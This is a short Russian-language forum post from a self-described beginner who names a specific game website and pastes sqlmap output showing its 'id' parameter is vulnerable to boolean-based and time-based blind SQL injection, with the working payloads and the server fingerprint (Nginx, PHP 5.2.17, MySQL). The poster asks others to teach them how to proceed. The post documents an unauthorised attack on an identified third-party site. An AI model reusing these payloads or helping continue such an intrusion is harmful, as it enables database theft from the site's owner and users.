
06.10.2017, 18:54
|
|
Новичок
Регистрация: 30.08.2013
Сообщений: 20
Провел на форуме: 6356
Репутация:
0
|
|
К сожелению да, не так силен в этом незнаю с чего начать даж
Был бы кто научит)
http://www.sfgames.ru/gameS.php?id=232
Код:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=232 AND 5858=5858
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=232 AND SLEEP(5)
---
[18:55:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
|
|
|